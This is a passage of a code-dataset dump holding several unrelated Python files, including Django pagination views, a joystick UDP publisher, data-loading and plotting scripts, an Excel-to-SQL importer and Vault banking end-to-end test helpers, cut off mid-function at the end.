num_pages: total number of pages\n # page_range: the index range over the total pages, e.g.: (1,10),(1,200)\n # page: the page object (whether there is a next page, whether there is a previous page;)\n current_page = request.GET.get('p')\n paginator = CustomPaginator(current_page,11,USER_LIST,10)\n try:\n # the Page object\n posts = paginator.page(current_page)\n # has_next whether there is a next page\n # next_page_number the number of the next page\n # has_previous whether there is a previous page\n # previous_page_number the number of the previous page\n # object_list the paginated data list, an already-sliced object\n # number the current page\n # paginator the paginator object\n except PageNotAnInteger:\n posts = paginator.page(1)\n except EmptyPage:\n posts = paginator.page(paginator.num_pages)\n return render(request,'index1.html',{'posts':posts})\n\n\ndef index2(request):\n from app01.pager import Pagination\n current_page = request.GET.get('p')\n page_obj = Pagination(666,current_page)\n\n data_list = USER_LIST[page_obj.start():page_obj.end()]\n return render(request,'index2.html',{'data':data_list,'page_obj':page_obj})","sub_path":"CodeStatistics/files/2418e633-36e4-4871-a5ad-059b33a528ef/django_page/app01/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"244268267","text":"\"\"\"\nAuthor: Rushikesh Patel\n\"\"\"\nfrom typing import Union\n\n\ndef get_response_obj(\n message: str,\n data: Union[dict, list] = None,\n error = None,\n):\n resp = {\n \"success\": True if not error else False,\n \"message\": message,\n }\n\n if error is not None:\n resp[\"error\"] = error\n else:\n resp[\"data\"] = data\n\n return resp","sub_path":"src/utils/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"424366672","text":"from UDPComms import Publisher, Subscriber, timeout\nimport xbox\n\nimport time\n\n## you need to git clone the PS4Joystick repo and run `sudo bash install.sh`\n\n## Configurable ##\nMESSAGE_RATE = 30\n\njoystick_pub = Publisher(8830)\njoystick_subscriber = Subscriber(8840, timeout=0.01)\njoystick = xbox.Joystick()\n\nwhile True:\n print(\"running\")\n\n left_y = joystick.leftY()\n right_y = joystick.rightY()\n right_x = joystick.rightX()\n left_x = joystick.leftX()\n\n L2 = joystick.leftTrigger()\n R2 = joystick.rightTrigger()\n\n R1 = joystick.rightBumper()\n L1 = joystick.leftBumper()\n\n square = joystick.X()\n x = joystick.A()\n circle = joystick.B()\n triangle = joystick.Y()\n\n dpadx = joystick.dpadRight() - joystick.dpadLeft()\n dpady = joystick.dpadUp() - joystick.dpadDown()\n\n msg = {\n \"ly\": left_y,\n \"lx\": left_x,\n \"rx\": right_x,\n \"ry\": right_y,\n \"L2\": L2,\n \"R2\": R2,\n \"R1\": R1,\n \"L1\": L1,\n \"dpady\": dpady,\n \"dpadx\": dpadx,\n \"x\": x,\n \"square\": square,\n \"circle\": circle,\n \"triangle\": triangle,\n \"message_rate\": MESSAGE_RATE,\n }\n joystick_pub.send(msg)\n\n try:\n msg = joystick_subscriber.get()\n except timeout:\n pass\n\n time.sleep(1 / MESSAGE_RATE)\n","sub_path":"joystick.py","file_name":"joystick.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"460858131","text":"import json\nfrom pandas.io.json import json_normalize\nimport pandas as pd\n\ndf_1 = pd.read_csv(\"testinput/flights_new_till_03dec.csv\", low_memory=False)\nprint(df_1.shape)\n\ndf_2 = pd.read_csv(\"testinput/flights_03dec_08_dec.csv\", low_memory=False)\nprint(df_2.shape)\n\ndf_3 = pd.read_csv(\"testinput/flights_failed.csv\", 
low_memory=False)\nprint(df_3.shape)\n\ncombined_df = pd.concat([df_1, df_2,df_3])\nprint(combined_df.shape)\n\ncombined_df.to_csv('testinput/all_test_with_failures.csv', encoding='utf-8', index=False)","sub_path":"Abhishek_arm_test/src/load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"183870620","text":"'''\r\nPlotting a validation_curve\r\nReference links:\r\n“https://blog.csdn.net/haha456487/article/details/103987011”\r\n“https://blog.csdn.net/aliceyangxi1987/article/details/73621144”\r\n(using an SVM model)\r\n\r\n'''\r\nfrom sklearn import datasets\r\nfrom sklearn import svm\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.model_selection import train_test_split,validation_curve\r\n\r\n# load the iris dataset\r\niris = datasets.load_iris()\r\nX = iris.data# feature data\r\ny = iris.target# class labels\r\nx_train, x_test, y_train, y_test = train_test_split(X, y, test_size=0.3,random_state=0)\r\n\r\nclf = svm.SVC()\r\nparam_range = np.logspace(-6, -1, 5)\r\ntrain_scores, valid_scores = validation_curve( estimator=clf, X=x_train, y=y_train, param_name=\"gamma\", param_range=param_range, cv=10)\r\n\r\ntrain_mean = np.mean(train_scores, axis=1)\r\ntrain_std = np.std(train_scores, axis=1)\r\nvalid_mean = np.mean(valid_scores, axis=1)\r\nvalid_std = np.std(valid_scores, axis=1)\r\n\r\n\r\n# visualize the output\r\n\r\nplt.plot(param_range, train_mean,label='training scores') \r\nplt.plot(param_range, valid_mean,label='validation scores') \r\nplt.legend()\r\n\r\nplt.show()","sub_path":"320180941370-liujunjiao/validation_curve.py","file_name":"validation_curve.py","file_ext":"py","file_size_in_byte":1144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"350653160","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 04 15:30:05 2014\n\n@author: ValovEA\n\"\"\"\nimport xlrd, os\nimport datetime\nimport pyodbc\nfrom Tkinter import Tk\nfrom tkFileDialog import askopenfilename\n\nTk().withdraw() # we don't want a full GUI, so keep the root window from appearing\nfilename = askopenfilename() # show an \"Open\" dialog box and return the path to the selected file\nam_file = datetime.datetime.now().strftime(\"%B_%d_%Y\")\nam_table = u'AM_Table'\n\ndef sql_ins(data): # takes a list of dicts as input\n try:\n conn = pyodbc.connect('DRIVER={SQL Server};SERVER=localhost;DATABASE=AM')\n cur = conn.cursor()\n print(u'trying to create table...')\n query = u\"IF NOT (EXISTS (SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME = '{0}')) CREATE TABLE {0} (id INT IDENTITY(1,1), fn NVARCHAR (30), tt INT, code NVARCHAR(8), in_am INT)\".format(am_table) \n print(query)\n cur.execute(query) \n print(u'appending...')\n rows = []\n for d in data:\n fn = d.get('fn')\n tt = d.get('tt')\n code = d.get('code')\n in_am = d.get('in_am')\n row = [fn,tt,code,in_am]\n rows.append(row)\n print('insertion')\n query = \"INSERT INTO {0} (fn,tt,code,in_am) VALUES(?,?,?,?)\".format(am_table)\n print(query)\n cur.executemany(query, rows)\n conn.commit()\n conn.close()\n except Exception as e:\n print (e)\n conn.close()\n\n \ndef set_code(l_dct):\n new_d = []\n for dct in l_dct:\n code = dct['code']\n cl = len(code)\n if cl == 2:\n cnew = '0000' + code\n elif cl == 3:\n cnew = '000' + code\n elif cl == 4:\n cnew = '00' + code\n elif cl == 5:\n cnew = '0' + code\n else:\n cnew = code\n dct['code'] = cnew\n #print(code,cnew)\n new_d.append(dct)\n return new_d\n \n \ndef cbc(rd_sheet, 
wt_sheet=None, rlo=0, rhi=None, # sheets and column/row ranges\nrshift=0, clo=0, chi=None, cshift = 0, file_name=None):\n wholebunch = []\n if rhi is None: rhi = rd_sheet.nrows\n if chi is None: chi = rd_sheet.ncols\n for row_index in range(rlo, rhi): # every cell of the selected range\n code = rd_sheet.cell(row_index, 0).value\n try:\n code = int(code[:7].strip())\n except Exception:\n continue\n# print(code)\n for col_index in range(clo, chi):\n tt1 = rd_sheet.cell(15, col_index).value\n tt = tt1[16:19].strip()\n am1 = rd_sheet.cell(row_index, col_index).value\n amx = am1[:2]\n if amx == u'Да':\n am = 1\n else:\n am = 0\n data = {'fn':str(file_name),'tt':int(tt),'code':str(code),'in_am':int(am)}\n wholebunch.append(data)\n return wholebunch\n \ndef main():\n try:\n print(\"processing_start\", datetime.datetime.now().strftime(\"%I:%M%p on %B %d, %Y\"))\n# Dir = 'C:/py/in'\n# ext = '.xlsx'\n# list_xls = [file for file in os.listdir(Dir) if file.endswith(ext)] # list of .xlsx files in the directory\n# files = [Dir + '/%s' % n for n in list_xls] # file & path\n# print(files) \n# for file_, file_name in enumerate(files):\n# print(file_name ,' processing...')\n rbook = xlrd.open_workbook(filename)\n rsheet = rbook.sheet_by_index(0)\n sql_ins(set_code(cbc(rsheet, rlo = 17, clo = 4, file_name = datetime.datetime.now().strftime(\"%d_%d_%Y\"))))\n print(\"Done\", datetime.datetime.now().strftime(\"%I:%M%p on %B %d, %Y\"))\n except Exception as e:\n print (e)\n \nif __name__ == \"__main__\":\n main() \n","sub_path":"AM_Statistics.py","file_name":"AM_Statistics.py","file_ext":"py","file_size_in_byte":3932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"385663176","text":"# Copyright @ 2020 Thought Machine Group Limited. 
All rights reserved.\n# standard libs\nimport json\nimport logging\nimport random\nimport os\nimport uuid\nimport time\nfrom datetime import datetime, timezone\nfrom enum import Enum\nfrom typing import Any, Dict, List, Optional\n\n# common\nimport common.test_utils.endtoend as endtoend\n\n# third party\nfrom requests import HTTPError\n\nlog = logging.getLogger(__name__)\nlogging.basicConfig(\n level=os.environ.get(\"LOGLEVEL\", \"INFO\"),\n format=\"%(asctime)s.%(msecs)03d - %(levelname)s: %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n)\n\n\nclass AccountStatus(Enum):\n ACCOUNT_STATUS_UNKNOWN = \"ACCOUNT_STATUS_UNKNOWN\"\n ACCOUNT_STATUS_OPEN = \"ACCOUNT_STATUS_OPEN\"\n ACCOUNT_STATUS_CLOSED = \"ACCOUNT_STATUS_CLOSED\"\n ACCOUNT_STATUS_CANCELLED = \"ACCOUNT_STATUS_CANCELLED\"\n ACCOUNT_STATUS_PENDING_CLOSURE = \"ACCOUNT_STATUS_PENDING_CLOSURE\"\n ACCOUNT_STATUS_PENDING = \"ACCOUNT_STATUS_PENDING\"\n\n\nclass CalendarEventStatus(Enum):\n BOTH = \"BOTH\"\n ONLY_TRUE = \"ONLY_TRUE\"\n ONLY_FALSE = \"ONLY_FALSE\"\n\n\ndef create_customer(\n title=\"CUSTOMER_TITLE_MR\",\n first_name=\"e2eTest\",\n middle_name=\"\",\n last_name=\"Smith\",\n dob=\"1980-12-25\",\n gender=\"CUSTOMER_GENDER_MALE\",\n nationality=\"GB\",\n email_address=\"e2etesting@tm.com\",\n mobile_phone_number=\"+442079460536\",\n home_phone_number=\"+442079460536\",\n business_phone_number=\"+442079460536\",\n contact_method=\"CUSTOMER_CONTACT_METHOD_NONE\",\n country_of_residence=\"GB\",\n country_of_taxation=\"GB\",\n accessibility=\"CUSTOMER_ACCESSIBILITY_AUDIO\",\n additional_details=None,\n details=None,\n):\n\n datestr = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n randid = str(random.getrandbits(58))\n cust_id = datestr + randid[len(datestr) :] # noqa: E203\n\n default_customer = {\n \"request_id\": uuid.uuid4().hex,\n \"customer\": {\n \"id\": cust_id,\n \"status\": \"CUSTOMER_STATUS_ACTIVE\",\n \"identifiers\": [\n {\"identifier_type\": \"IDENTIFIER_TYPE_USERNAME\", \"identifier\": cust_id}\n ],\n \"customer_details\": {\n \"title\": title,\n \"first_name\": first_name,\n \"middle_name\": middle_name,\n \"last_name\": last_name,\n \"dob\": dob,\n \"gender\": gender,\n \"nationality\": nationality,\n \"email_address\": email_address,\n \"mobile_phone_number\": mobile_phone_number,\n \"home_phone_number\": home_phone_number,\n \"business_phone_number\": business_phone_number,\n \"contact_method\": contact_method,\n \"country_of_residence\": country_of_residence,\n \"country_of_taxation\": country_of_taxation,\n \"accessibility\": accessibility,\n },\n \"additional_details\": additional_details,\n },\n }\n\n customer_details = json.dumps(details if details else default_customer)\n customer = endtoend.helper.send_request(\n \"post\", \"/v1/customers\", data=customer_details\n )\n\n log.info(\"Customer %s created\", customer[\"id\"])\n endtoend.testhandle.customers.append(customer[\"id\"])\n return customer[\"id\"]\n\n\ndef get_customer(customer_id):\n resp = endtoend.helper.send_request(\"get\", \"/v1/customers/\" + customer_id)\n return resp\n\n\ndef get_existing_test_customer():\n if endtoend.testhandle.customers:\n return endtoend.testhandle.customers[0]\n else:\n return create_customer()\n\n\ndef set_customer_status(customer_id, status):\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"customer\": {\"status\": status},\n \"update_mask\": {\"paths\": [\"status\"]},\n }\n\n resp = endtoend.helper.send_request(\n \"put\", \"/v1/customers/\" + customer_id, data=json.dumps(post_body)\n )\n log.info(\"Customer %s 
set to %s\", customer_id, status)\n return resp\n\n\ndef get_customer_accounts(customer_id):\n resp = endtoend.helper.send_request(\n \"get\",\n \"/v1/accounts\",\n params={\"stakeholder_id\": customer_id, \"page_size\": \"100\"},\n )\n\n return resp[\"accounts\"]\n\n\ndef get_customer_addresses(customer_id):\n body = {\"customer_id\": customer_id, \"page_size\": \"1000\", \"include_previous\": \"True\"}\n\n resp = endtoend.helper.send_request(\"get\", \"/v1/customer-addresses\", params=body)\n\n # A list of customer addresses, ordered by descending creation time.\n return resp[\"customer_addresses\"]\n\n\ndef create_payment_device(routing_info, status=\"PAYMENT_DEVICE_STATUS_ACTIVE\"):\n post_body = {\n \"payment_device\": {\"routing_info\": routing_info, \"status\": status},\n \"request_id\": uuid.uuid4().hex,\n }\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/payment-devices\", data=json.dumps(post_body)\n )\n\n return resp\n\n\ndef create_payment_device_link(\n payment_device_id,\n account_id,\n token=None,\n status=\"PAYMENT_DEVICE_LINK_STATUS_ACTIVE\",\n):\n\n post_body = {\n \"payment_device_link\": {\n \"token\": token,\n \"payment_device_id\": payment_device_id,\n \"account_id\": account_id,\n \"status\": status,\n },\n \"request_id\": uuid.uuid4().hex,\n }\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/payment-device-links\", data=json.dumps(post_body)\n )\n\n return resp\n\n\ndef get_payment_device_links(\n tokens=None,\n payment_device_ids=None,\n account_ids=None,\n effective_timestamp=None,\n include_inactive=None,\n):\n # Returns a list of payment device links, or an empty list if none found.\n\n resp = endtoend.helper.send_request(\n \"get\",\n \"/v1/payment-device-links\",\n params={\n \"tokens\": tokens,\n \"payment_device_ids\": payment_device_ids,\n \"account_ids\": account_ids,\n \"effective_timestamp\": effective_timestamp,\n \"include_inactive\": include_inactive,\n },\n )\n\n return resp[\"payment_device_links\"]\n\n\ndef get_payment_device(payment_device_ids):\n # If this ID doesn't exist, Vault will throw an error\n\n resp = endtoend.helper.send_request(\n \"get\", \"/v1/payment-devices:batchGet\", params={\"ids\": payment_device_ids}\n )\n\n return resp[\"payment_devices\"][payment_device_ids]\n\n\ndef get_uk_acc_num_and_sort_code(account_id):\n pd_link = get_payment_device_links(account_ids=account_id)\n\n if len(pd_link) == 0:\n raise NameError(\n \"No payment device link found for \" \"account {}\".format(account_id)\n )\n\n # todo: Search through all pd_links\n pd = get_payment_device(pd_link[0][\"payment_device_id\"])\n\n if all(word in pd[\"routing_info\"] for word in [\"account_number\", \"bank_id\"]):\n return pd[\"routing_info\"][\"account_number\"], pd[\"routing_info\"][\"bank_id\"]\n else:\n raise NameError(\n \"No account number or sort code found for account \"\n \"{}. 
Has it been set up with UK routing info?\".format(account_id)\n )\n\n\ndef create_flag_definition(\n flag_id: str,\n name: str = \"\",\n description: str = \"\",\n required_flag_level: str = \"FLAG_LEVEL_ACCOUNT\",\n flag_visibility: str = \"FLAG_VISIBILITY_CONTRACT\",\n) -> Dict[str, str]:\n\n name = name or flag_id\n description = description or flag_id\n\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"flag_definition\": {\n \"id\": flag_id,\n \"name\": name,\n \"description\": description,\n \"required_flag_level\": required_flag_level,\n \"flag_visibility\": flag_visibility,\n },\n }\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/flag-definitions\", data=json.dumps(post_body)\n )\n log.info(f\"Flag created: {description}\")\n return resp\n\n\ndef list_flag_definitions(\n flag_visibility: str = \"FLAG_VISIBILITY_CONTRACT\",\n flag_levels: List[str] = None,\n include_inactive: str = \"true\",\n) -> List[Dict[str, Any]]:\n body = {\n \"flag_visibility_level\": flag_visibility,\n \"flag_levels\": flag_levels or [\"FLAG_LEVEL_ACCOUNT\", \"FLAG_LEVEL_CUSTOMER\"],\n \"include_inactive\": include_inactive,\n }\n resp = endtoend.helper.list_resources(\"flag-definitions\", params=body)\n return resp\n\n\ndef batch_get_flag_definitions(ids: List[str]) -> Dict[str, Dict[str, str]]:\n\n return endtoend.helper.send_request(\n \"get\", \"/v1/flag-definitions:batchGet\", params={\"ids\": ids}\n )[\"flag_definitions\"]\n\n\ndef create_flag(\n flag_name: str,\n account_id: str = None,\n customer_id: str = None,\n payment_device_id: str = None,\n description: str = None,\n):\n\n description = description or flag_name\n if account_id:\n target = \"account_id\"\n target_id = account_id\n elif customer_id:\n target = \"customer_id\"\n target_id = customer_id\n elif payment_device_id:\n target = \"payment_device_id\"\n target_id = payment_device_id\n else:\n raise NameError(\"No target has been specified so flag can not be applied!\")\n\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"flag\": {\n \"flag_definition_id\": flag_name,\n \"description\": description,\n target: target_id,\n },\n }\n\n resp = endtoend.helper.send_request(\"post\", \"/v1/flags\", data=json.dumps(post_body))\n log.info(f\"Flag applied for account {account_id}: {description}\")\n return resp\n\n\ndef remove_flag(flag_id: str) -> Dict[str, str]:\n put_body = {\n \"request_id\": uuid.uuid4().hex,\n \"flag\": {\n \"is_active\": False,\n },\n \"update_mask\": {\"paths\": [\"is_active\"]},\n }\n resp = endtoend.helper.send_request(\n \"put\", f\"/v1/flags/{flag_id}\", data=json.dumps(put_body)\n )\n log.info(f'Flag {flag_id} {resp[\"description\"]} removed')\n return resp\n\n\ndef get_flag(flag_name: str, account_ids: List[str] = None) -> List[Dict[str, Any]]:\n body = {\"flag_definition_id\": flag_name, \"account_ids\": account_ids or []}\n resp = endtoend.helper.list_resources(\"flags\", params=body)\n return resp\n\n\ndef create_restriction_set_definition_version(\n restriction_id, restriction_type, restriction_level, description=None\n):\n\n description = description or restriction_id\n\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"restriction_set_definition_version\": {\n \"restriction_set_definition_id\": restriction_id,\n \"description\": description,\n \"restriction_definitions\": [\n {\n \"restriction_type\": restriction_type,\n \"required_restriction_levels\": restriction_level,\n }\n ],\n },\n }\n\n resp = endtoend.helper.send_request(\n \"post\",\n 
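# NB: this path hardcodes the 'blocking_test' definition id rather than\n # deriving it from the restriction_id argument\n 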
\"/v1/restriction-set-definition/blocking_test/versions\",\n data=json.dumps(post_body),\n )\n log.info(f\"Restriction created: {description}\")\n return resp\n\n\ndef create_restriction_set(account_id, restriction_id, name=None, description=None):\n\n name = name or restriction_id\n description = description or restriction_id\n\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"restriction_set\": {\n \"restriction_set_definition_id\": restriction_id,\n \"name\": name,\n \"description\": description,\n \"restriction_set_parameters\": {},\n \"account_id\": account_id,\n },\n }\n\n resp = endtoend.helper.send_request(\n \"post\", \"/v1/restriction-sets\", data=json.dumps(post_body)\n )\n log.info(\"Restriction applied to account %s preventing debits\", account_id)\n return resp\n\n\ndef remove_restriction_set(account_id, restriction_set_id):\n resp = update_restriction_set(restriction_set_id, \"is_active\", False)\n log.info(f\"Restriction set removed from account {account_id} preventing debits\")\n return resp\n\n\ndef update_restriction_set(restriction_set_id, update_field, update_value):\n post_body = {\n \"request_id\": uuid.uuid4().hex,\n \"restriction_set\": {\"id\": restriction_set_id, update_field: update_value},\n \"update_mask\": {\"paths\": [update_field]},\n }\n\n resp = endtoend.helper.send_request(\n \"put\", \"/v1/restriction-sets/\" + restriction_set_id, data=json.dumps(post_body)\n )\n log.info(\n f\"Restriction set {restriction_set_id} updated: {update_field} set to {update_value}\"\n )\n return resp\n\n\ndef get_account_schedule_assocs(account_id: str) -> List[Dict[str, Any]]:\n body = {\n \"account_id\": account_id,\n }\n resp = endtoend.helper.list_resources(\"account-schedule-assocs\", params=body)\n\n # A list of account to schedule associations\n return resp\n\n\ndef get_schedules(schedule_ids):\n body = {\"ids\": schedule_ids}\n\n resp = endtoend.helper.send_request(\"get\", \"/v1/schedules:batchGet\", params=body)\n\n # A dict of schedule_id to schedule objects\n return resp[\"schedules\"]\n\n\ndef get_jobs(schedule_id: str) -> List[Dict[str, Any]]:\n \"\"\"\n Gets all the jobs with the specified schedule_id\n :param schedule_id: id for filterling which jobs to retrieved.\n ...\n :return: List of schedules with the specified schedule_id else\n return empty list\n \"\"\"\n body = {\"schedule_id\": schedule_id}\n result = endtoend.helper.list_resources(\"jobs\", params=body)\n return result\n\n\ndef get_account_schedules(\n account_id: str, invalid_statuses: Optional[List[str]] = None\n):\n if invalid_statuses != []:\n invalid_statuses = invalid_statuses or [\"SCHEDULE_STATUS_DISABLED\"]\n account_schedule_assocs = get_account_schedule_assocs(account_id)\n\n if not account_schedule_assocs:\n return {}\n account_schedule_ids = [assoc[\"schedule_id\"] for assoc in account_schedule_assocs]\n\n response_account_schedules = get_schedules(account_schedule_ids)\n\n account_schedules = {}\n for _, schedule_details in response_account_schedules.items():\n # Schedule display name is of format \" for \"\n if schedule_details[\"status\"] not in invalid_statuses and schedule_details[\n \"display_name\"\n ].endswith(f\" for {account_id}\"):\n account_schedule_name = schedule_details[\"display_name\"].replace(\n f\" for {account_id}\", \"\"\n )\n account_schedules[account_schedule_name] = schedule_details\n\n # A dict of schedule event_names to their schedule objects\n return account_schedules\n\n\ndef get_account_derived_parameters(account_id: str, effective_timestamp: str = 
\"\"):\n body = {\"fields_to_include\": [\"INCLUDE_FIELD_DERIVED_INSTANCE_PARAM_VALS\"]}\n if effective_timestamp:\n body.update({\"instance_param_vals_effective_timestamp\": effective_timestamp})\n\n resp = endtoend.helper.send_request(\n \"get\", f\"/v1/accounts/{account_id}\", params=body\n )\n\n return resp[\"derived_instance_param_vals\"]\n\n\ndef get_balances(\n account_id: str,\n from_value_time: datetime = None,\n to_value_time: datetime = None,\n exclude_starting_balance: bool = False,\n live: bool = True,\n posting_instruction_batch_id: str = \"\",\n) -> List[Dict[str, str]]:\n \"\"\"\n Gets balances for a given account\n :param account_id: the account to retrieve\n :param from_value_time: Optional value time to retrieve from. Ignored if live=True\n :param to_value_time: Optional value time to retrieve up until. Ignored if live=True\n :param exclude_starting_balance: if True the balances before from_value_time are excluded.\n Ignored if live=True\n :param live: set to True if for live balances only, or False to also get historical balances\n :param posting_instruction_batch_id: The posting instruction batch ID that initially created\n the balance\n :return: the list of balances\n \"\"\"\n params = {\n \"account_id\": account_id,\n \"live\": live,\n \"posting_instruction_batch_id\": posting_instruction_batch_id,\n }\n if not live:\n if from_value_time:\n params.update(\n {\n \"time_range.from_value_time\": from_value_time.astimezone(\n timezone.utc\n ).isoformat()\n }\n )\n if to_value_time:\n params.update(\n {\n \"time_range.to_value_time\": to_value_time.astimezone(\n timezone.utc\n ).isoformat()\n }\n )\n if exclude_starting_balance:\n params.update(\n {\"time_range.exclude_starting_balance\": exclude_starting_balance}\n )\n\n resp = endtoend.helper.list_resources(\"balances\", params)\n\n return resp\n\n\ndef get_account_update(account_update_id: str) -> Dict[str, Any]:\n \"\"\"\n Retrieve a specific account update by its id\n :param account_update_id: id of the account update to retrieve\n :return: the account update resource\n \"\"\"\n\n resp = endtoend.helper.send_request(\n \"get\", f\"/v1/account-updates/{account_update_id}\"\n )\n\n return resp\n\n\ndef get_account_updates(\n account_id: str, statuses: List[str] = None\n) -> List[Dict[str, Any]]:\n \"\"\"\n Get a list of account updates for a given account\n :param account_id: account id for the account to get updates for\n :param statuses: statuses of account updates to filter on. 
Optional.\n    :return: list of account updates matching the criteria\n    \"\"\"\n\n    params = {\"account_id\": account_id, \"statuses\": statuses}\n    return endtoend.helper.list_resources(\"account-updates\", params)\n\n\ndef get_account_updates_by_type(\n    account_id: str, update_types: List[str], statuses: List[str] = None\n) -> List[Dict[str, Any]]:\n    \"\"\"\n    Gets a list of account updates and filters by type\n    :param account_id: the account id to get account updates for\n    :param update_types: the list of account update types we want to filter for (not handled in API)\n    :param statuses: the list of account update statuses we want to filter for (handled in API)\n    :return: List of account updates\n    \"\"\"\n\n    account_updates = get_account_updates(account_id, statuses)\n    # each account update carries its type as a top-level key, so key membership is the type filter\n    account_updates_by_type = [\n        account_update\n        for account_update in account_updates\n        for update_type in update_types\n        if update_type in account_update\n    ]\n    return account_updates_by_type\n\n\ndef get_product_version(product_version_id: str, include_code: bool = False) -> Dict:\n    \"\"\"\n    Fetches product version from instance.\n\n    :param product_version_id: Instance version id of the product, not the id found in the sc file\n    :param include_code: Specifies whether raw code needs to be included in response\n    \"\"\"\n    view = [\"PRODUCT_VERSION_VIEW_INCLUDE_CODE\"] if include_code else []\n    params = {\"ids\": product_version_id, \"view\": view}\n    resp = endtoend.helper.send_request(\n        \"get\", \"/v1/product-versions:batchGet\", params=params\n    )\n    return resp[\"product_versions\"][product_version_id]\n\n\ndef create_account_update(\n    account_id: str,\n    account_update: Dict[str, Dict[str, Any]],\n    account_update_id: str = \"\",\n) -> Dict[str, Any]:\n    \"\"\"\n    Creates an account update for the given account\n\n    :param account_id: account id of the account to update\n    :param account_update: Dict where the key is the desired account update (e.g.\n    instance_param_vals_update, product_version_update, activation_update, closure_update) and the\n    value is the Dict with the required parameters for the account update type. For example:\n    {\n        'instance_param_vals_update': {\n            'instance_param_vals': {\n                'KEY': 'value1'\n            }\n        }\n    }\n    :param account_update_id: optional account update id to use. 
Randomly generated by service if\n omitted\n :return: The resulting account update resource\n \"\"\"\n\n body = {\n \"request_id\": uuid.uuid4().hex,\n \"account_update\": {\n \"id\": account_update_id,\n \"account_id\": account_id,\n **account_update,\n },\n }\n jsonbody = json.dumps(body)\n resp = endtoend.helper.send_request(\"post\", \"/v1/account-updates\", data=jsonbody)\n log.info(f\"Account update {account_update} created\")\n return resp\n\n\ndef create_closure_update(account_id: str) -> Dict[str, Any]:\n \"\"\"\n Creates an account update to re-run the close_code hook once the account status is already\n 'ACCOUNT_STATUS_PENDING_CLOSURE'\n :param account_id: the account id of the account to update\n :return: The resulting account update resource\n \"\"\"\n account_update = {\"closure_update\": {}}\n return create_account_update(account_id, account_update)\n\n\ndef update_account_instance_parameters(\n account_id: str, instance_param_vals: Dict[str, Any]\n) -> Dict[str, Any]:\n \"\"\"\n Creates an account update to update specified instance parameters to the specified values\n :param account_id: the account id of the account to update\n :param instance_param_vals: dictionary of instance parameter names to updated values\n :return: The resulting account update resource\n \"\"\"\n account_update = {\n \"instance_param_vals_update\": {\"instance_param_vals\": instance_param_vals}\n }\n return create_account_update(account_id, account_update)\n\n\ndef update_account(account_id: str, status: AccountStatus) -> Dict[str, Any]:\n \"\"\"\n Update an account\n :param account_id: account id of the account to update\n :param status: new account status\n :return: the updated account\n \"\"\"\n body = {\n \"request_id\": str(uuid.uuid4()),\n \"account\": {\"status\": status.value},\n \"update_mask\": {\"paths\": [\"status\"]},\n }\n body = json.dumps(body)\n resp = endtoend.helper.send_request(\"put\", \"/v1/accounts/\" + account_id, data=body)\n return resp\n\n\ndef create_product_version(\n request_id: str,\n code: str,\n product_id: str,\n supported_denominations: List[str],\n tags: List[str] = None,\n params: List[Any] = None,\n is_internal: bool = False,\n migration_strategy: str = \"PRODUCT_VERSION_MIGRATION_STRATEGY_UNKNOWN\",\n contract_properties: Dict[str, Any] = None,\n) -> Dict[str, Any]:\n \"\"\"\n Creates a product version by using the core api endpoint\n :param request_id: str, unique string ID that is used to ensure the request is idempotent\n :param code: str, the smart contract code\n :param product_id: str, the ID of the product we want to create\n :param supported_denominations: List[str], the denominations supported by this product version\n :param tags: List[str], tags for the product version\n :param params: List[object], the parameter values for the product version\n :param is_internal: bool, denotes if the product being uploaded is an internal product or not\n :param migration_strategy: str, the migration strategy for applying the new version\n :param contract_properties: Dict[str, object], the contract specific property values\n :return: Dict[str, object], return value of core api call\n \"\"\"\n contract_properties = contract_properties or {}\n display_name = contract_properties.get(\"display_name\", \"\")\n if is_internal:\n migration_strategy = \"PRODUCT_VERSION_MIGRATION_STRATEGY_NEW_PRODUCT\"\n\n post_body = {\n # ProductVersions are immutable, so we can use that to simply return an already created\n # ProductVersion.\n \"request_id\": request_id,\n 
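# display_name is read from contract_properties above and defaults to \"\" when not supplied\n        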
\"product_version\": {\n \"product_id\": product_id,\n \"code\": code,\n \"supported_denominations\": supported_denominations,\n \"params\": params,\n \"tags\": tags or [],\n \"display_name\": display_name,\n \"description\": \"\",\n \"summary\": \"\",\n },\n \"is_internal\": is_internal,\n \"migration_strategy\": migration_strategy,\n }\n\n post_body = json.dumps(post_body)\n\n resp = endtoend.helper.send_request(\"post\", \"/v1/product-versions\", data=post_body)\n\n return resp\n\n\ndef create_account_schedule_tag(\n account_schedule_tag_id: str,\n description: str = \"\",\n sends_scheduled_operation_reports: bool = True,\n schedule_status_override: str = \"ACCOUNT_SCHEDULE_TAG_SCHEDULE_STATUS_OVERRIDE_NO_OVERRIDE\",\n schedule_status_override_start_timestamp: Optional[str] = None,\n schedule_status_override_end_timestamp: Optional[str] = None,\n test_pause_at_timestamp: Optional[str] = None,\n) -> Dict[str, str]:\n\n post_body = {\n \"request_id\": str(uuid.uuid4()),\n \"account_schedule_tag\": {\n \"id\": account_schedule_tag_id,\n \"description\": description,\n \"sends_scheduled_operation_reports\": sends_scheduled_operation_reports,\n \"schedule_status_override\": 